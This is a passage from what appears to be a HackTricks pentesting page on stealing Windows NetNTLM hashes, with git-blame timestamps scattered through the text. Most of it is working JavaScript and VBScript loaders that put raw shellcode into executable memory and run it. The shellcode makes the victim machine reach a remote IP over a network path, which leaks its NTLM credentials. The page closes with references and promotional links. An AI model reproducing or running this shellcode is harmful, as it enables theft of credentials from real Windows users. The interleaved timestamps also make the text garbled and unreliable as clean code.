0x3c, 0x61, 0x0f, 0xbe, 0xc0, 0x7c, 0x03, 0x83, 0xe8, 0x20, 0x03, 0xd0, 0x41, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xea, 0x8b,
0xc2, 0xc3, 0x8d, 0x41, 0xf8, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x14, 0x53, 0x56, 0x57, 0x89, 0x4d, 0xf4, 0x64, 0xa1,
0x30, 0x05, 0x05, 0x05, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14, 0x89, 0x45, 0xec, 0x8b,
0xf8, 0x8b, 0xcf, 0xe8, 0xd2, 0xff, 0xff, 0xff, 0x8b, 0x70, 0x18, 0x8b, 0x3f, 0x85, 0xf6, 0x74, 0x4f, 0x8b, 0x46, 0x3c,
0x8b, 0x5c, 0x30, 0x78, 0x85, 0xdb, 0x74, 0x44, 0x8b, 0x4c, 0x33, 0x0c, 0x03, 0xce, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x8b,
0x4c, 0x33, 0x20, 0x89, 0x45, 0xf8, 0x33, 0xc0, 0x03, 0xce, 0x89, 0x4d, 0xf0, 0x89, 0x45, 0xfc, 0x39, 0x44, 0x33, 0x18,
0x76, 0x22, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0xe8, 0x75, 0xff, 0xff, 0xff, 0x03, 0x45, 0xf8, 0x39, 0x45, 0xf4, 0x74, 0x1c,
0x8b, 0x45, 0xfc, 0x8b, 0x4d, 0xf0, 0x40, 0x89, 0x45, 0xfc, 0x3b, 0x44, 0x33, 0x18, 0x72, 0xde, 0x3b, 0x7d, 0xec, 0x75,
0x9c, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x4d, 0xfc, 0x8b, 0x44, 0x33, 0x24, 0x8d, 0x04, 0x48, 0x0f, 0xb7,
0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05,
0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33,
0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05];
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
for(var i = 0; i < sc.length ; i + + ) DX . NumPut ( sc [ i ] , scLocation , i ) ;
var thread = DX.CreateThread(0,0,scLocation,0,0);
```
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js ](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js )
2022-07-11 08:44:04 +00:00
#### VBScript
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
```vba
2020-07-15 15:43:14 +00:00
' Author : Osanda Malith Jayathissa (@OsandaMalith)
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith.com
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Set DX = CreateObject("DynamicWrapperX")
DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"
DX.Register "kernel32.dll","CreateThread","i=uullu","r=u"
DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Const MEM_COMMIT = & H1000
Const PAGE_EXECUTE_READWRITE = & H40
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
shellcode = Array( _
& He8, & Hff, & Hff, & Hff, & Hff, & Hc0, & H5f, & Hb9, & H55, & H03, & H02, & H02, & H81, & Hf1, & H02, & H02, & H02, & H02, & H83, & Hc7, _
& H1d, & H33, & Hf6, & Hfc, & H8a, & H07, & H3c, & H05, & H0f, & H44, & Hc6, & Haa, & He2, & Hf6, & He8, & H05, & H05, & H05, & H05, & H5e, _
& H8b, & Hfe, & H81, & Hc6, & H29, & H01, & H05, & H05, & Hb9, & H02, & H05, & H05, & H05, & Hfc, & Had, & H01, & H3c, & H07, & He2, & Hfa, _
& H56, & Hb9, & H8d, & H10, & Hb7, & Hf8, & He8, & H5f, & H05, & H05, & H05, & H68, & H31, & H01, & H05, & H05, & Hff, & Hd0, & Hb9, & He0, _
& H53, & H31, & H4b, & He8, & H4e, & H05, & H05, & H05, & Hb9, & Hac, & Hd5, & Haa, & H88, & H8b, & Hf0, & He8, & H42, & H05, & H05, & H05, _
& H6a, & H05, & H68, & H80, & H05, & H05, & H05, & H6a, & H03, & H6a, & H05, & H6a, & H01, & H68, & H05, & H05, & H05, & H80, & H68, & H3e, _
& H01, & H05, & H05, & Hff, & Hd0, & H6a, & H05, & Hff, & Hd6, & H33, & Hc0, & H5e, & Hc3, & H33, & Hd2, & Heb, & H10, & Hc1, & Hca, & H0d, _
& H3c, & H61, & H0f, & Hbe, & Hc0, & H7c, & H03, & H83, & He8, & H20, & H03, & Hd0, & H41, & H8a, & H01, & H84, & Hc0, & H75, & Hea, & H8b, _
& Hc2, & Hc3, & H8d, & H41, & Hf8, & Hc3, & H55, & H8b, & Hec, & H83, & Hec, & H14, & H53, & H56, & H57, & H89, & H4d, & Hf4, & H64, & Ha1, _
& H30, & H05, & H05, & H05, & H89, & H45, & Hfc, & H8b, & H45, & Hfc, & H8b, & H40, & H0c, & H8b, & H40, & H14, & H89, & H45, & Hec, & H8b, _
& Hf8, & H8b, & Hcf, & He8, & Hd2, & Hff, & Hff, & Hff, & H8b, & H70, & H18, & H8b, & H3f, & H85, & Hf6, & H74, & H4f, & H8b, & H46, & H3c, _
& H8b, & H5c, & H30, & H78, & H85, & Hdb, & H74, & H44, & H8b, & H4c, & H33, & H0c, & H03, & Hce, & He8, & H96, & Hff, & Hff, & Hff, & H8b, _
& H4c, & H33, & H20, & H89, & H45, & Hf8, & H33, & Hc0, & H03, & Hce, & H89, & H4d, & Hf0, & H89, & H45, & Hfc, & H39, & H44, & H33, & H18, _
& H76, & H22, & H8b, & H0c, & H81, & H03, & Hce, & He8, & H75, & Hff, & Hff, & Hff, & H03, & H45, & Hf8, & H39, & H45, & Hf4, & H74, & H1c, _
& H8b, & H45, & Hfc, & H8b, & H4d, & Hf0, & H40, & H89, & H45, & Hfc, & H3b, & H44, & H33, & H18, & H72, & Hde, & H3b, & H7d, & Hec, & H75, _
& H9c, & H33, & Hc0, & H5f, & H5e, & H5b, & Hc9, & Hc3, & H8b, & H4d, & Hfc, & H8b, & H44, & H33, & H24, & H8d, & H04, & H48, & H0f, & Hb7, _
& H0c, & H30, & H8b, & H44, & H33, & H1c, & H8d, & H04, & H88, & H8b, & H04, & H30, & H03, & Hc6, & Heb, & Hdf, & H21, & H05, & H05, & H05, _
& H50, & H05, & H05, & H05, & H6b, & H65, & H72, & H6e, & H65, & H6c, & H33, & H32, & H2e, & H64, & H6c, & H6c, & H05, & H2f, & H2f, & H33, _
& H35, & H2e, & H31, & H36, & H34, & H2e, & H31, & H35, & H33, & H2e, & H32, & H32, & H34, & H2f, & H61, & H61, & H05)
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
scLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
For i =LBound(shellcode) to UBound(shellcode)
DX.NumPut shellcode(i),scLocation,i
Next
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
thread = DX.CreateThread (0,0,scLocation,0,0)
```
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vbs ](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vbs )
There might be many other ways in Windows. You never know! 🙂
2022-07-11 08:44:04 +00:00
## References
2020-07-15 15:43:14 +00:00
2022-04-05 22:24:52 +00:00
* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/** ](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ )
2020-12-23 00:17:28 +00:00
* [https://attack.mitre.org/techniques/T1187/ ](https://attack.mitre.org/techniques/T1187/ )
2020-07-15 15:43:14 +00:00
2022-04-28 16:01:33 +00:00
< details >
2023-04-07 08:52:01 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > < a href = "https://twitter.com/carlospolopm" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
2022-04-28 16:01:33 +00:00
2022-12-05 22:29:21 +00:00
- **Share your hacking tricks by submitting PRs to the [hacktricks repo ](https://github.com/carlospolop/hacktricks ) and [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2022-04-28 16:01:33 +00:00
< / details >